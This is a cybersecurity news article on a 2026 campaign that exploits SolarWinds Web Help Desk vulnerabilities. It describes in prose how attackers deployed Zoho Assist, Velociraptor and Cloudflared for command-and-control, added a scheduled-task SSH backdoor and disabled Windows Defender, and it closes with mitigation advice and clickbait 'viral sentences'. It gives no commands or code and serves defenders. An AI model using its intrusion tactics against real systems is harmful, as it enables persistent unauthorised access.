Cyberattackers Exploit SolarWinds WHD Flaws to Deploy DFIR Tools for Malicious Gain

In a startling revelation that underscores the ever-evolving landscape of cybersecurity threats, hackers have been discovered exploiting vulnerabilities in SolarWinds Web Help Desk (WHD) to deploy legitimate tools for nefarious purposes. This sophisticated attack chain, uncovered by researchers at Huntress Security, highlights the alarming trend of threat actors leveraging trusted software to infiltrate and compromise high-value targets.

The Anatomy of the Attack

The attack, which Huntress believes began on January 16, 2026, targets at least three organizations and employs a multi-stage intrusion technique. The threat actors exploit two critical vulnerabilities in SolarWinds WHD: CVE-2025-40551 and CVE-2025-26399. Both flaws have been flagged by the Cybersecurity and Infrastructure Security Agency (CISA) as being actively exploited in the wild, with a critical severity rating that allows for remote code execution without authentication.

Initial Access and Tool Deployment

Upon gaining initial access, the attackers swiftly deploy a series of tools to establish persistence and command-and-control (C2) capabilities. The first tool in their arsenal is the Zoho ManageEngine Assist agent, fetched via an MSI file from the Catbox file-hosting platform. This tool is configured for unattended access and linked to an anonymous Proton Mail account, enabling the attackers to conduct Active Directory (AD) reconnaissance and direct hands-on keyboard activity.

Following this, the threat actors deploy Velociraptor, a legitimate digital forensics and incident response (DFIR) tool that has recently been abused in ransomware attacks, as warned by Cisco Talos. In this campaign, Velociraptor is repurposed as a C2 framework, communicating with the attackers via Cloudflare Workers. Notably, the attackers use an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw, allowing them to increase permissions on the compromised host.

Persistence and Redundancy

To ensure persistent access, the attackers also install Cloudflared from Cloudflare’s official GitHub repository. This tool serves as a secondary tunnel-based access channel, providing redundancy for C2 communication. In some instances, persistence is further reinforced through a scheduled task (TPMProfiler) that opens an SSH backdoor via QEMU.

The attackers take additional steps to evade detection by disabling Windows Defender and Firewall via registry modifications. This ensures that subsequent payload downloads are not blocked. As a testament to their efficiency, the threat actors download a fresh copy of the VS Code binary mere seconds after disabling Defender.

The Broader Implications

This attack chain is not an isolated incident. Microsoft security researchers have also observed similar multi-stage intrusions exploiting internet-exposed SolarWinds WHD instances. However, Microsoft did not confirm the exploitation of the two specific vulnerabilities identified by Huntress.

The use of legitimate tools like Velociraptor and Zoho ManageEngine in cyberattacks is a growing concern. These tools, designed for legitimate purposes such as incident response and remote support, are being weaponized by threat actors to blend in with normal network activity, making detection and mitigation more challenging.

Mitigation and Defense Strategies

In light of these findings, system administrators are urged to take immediate action to protect their environments. Key recommendations include:

1. Upgrade SolarWinds WHD: Ensure that all instances are updated to version 2026.1 or later to patch the identified vulnerabilities.
2. Restrict Access: Remove public internet access to SolarWinds WHD admin interfaces to minimize exposure.
3. Reset Credentials: Change all credentials associated with the SolarWinds WHD product to prevent unauthorized access.
4. Monitor for Indicators of Compromise (IoCs): Utilize the Sigma rules and IoCs provided by Huntress to detect suspicious activity, such as Zoho Assist, Velociraptor, Cloudflared, and VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.

Attribution and Targets

Neither Microsoft nor Huntress has attributed the attacks to any specific threat group. The identities of the targeted organizations remain undisclosed, though Microsoft has characterized the breached environments as “high-value assets.” This lack of attribution underscores the complexity and sophistication of modern cyber threats, where attackers often operate with a high degree of anonymity.

Conclusion

The exploitation of SolarWinds WHD vulnerabilities to deploy DFIR tools for malicious purposes is a stark reminder of the evolving tactics employed by cybercriminals. As organizations continue to rely on legitimate software for critical operations, the potential for these tools to be repurposed for nefarious activities grows. Vigilance, timely patching, and robust monitoring are essential to safeguarding against such threats.

In the ever-shifting landscape of cybersecurity, staying ahead of attackers requires a proactive approach, continuous education, and a commitment to implementing best practices. The SolarWinds WHD incident serves as a wake-up call for organizations to reassess their security posture and fortify their defenses against increasingly sophisticated threats.

Tags: SolarWinds, WHD, vulnerabilities, cyberattacks, DFIR tools, Velociraptor, Zoho ManageEngine, Cloudflare, CISA, Huntress Security, Microsoft, ransomware, incident response, cybersecurity, threat actors, privilege escalation, persistence, command-and-control, IoCs, Sigma rules, high-value assets, patching, monitoring, defense strategies.

Viral Sentences:

• “Hackers are weaponizing legitimate tools to infiltrate high-value targets!”
• “SolarWinds WHD flaws exploited to deploy DFIR tools for malicious gain!”
• “Threat actors use outdated Velociraptor version for privilege escalation!”
• “Cloudflare tunnels and SSH backdoors ensure persistent access!”
• “Disable Windows Defender? Attackers do it in seconds!”
• “Zoho ManageEngine repurposed for Active Directory reconnaissance!”
• “CISA flags critical SolarWinds vulnerabilities as actively exploited!”
• “Huntress uncovers multi-stage intrusion targeting three organizations!”
• “Microsoft observes similar attacks on internet-exposed SolarWinds WHD instances!”
• “Stay ahead of cybercriminals with timely patching and robust monitoring!”

,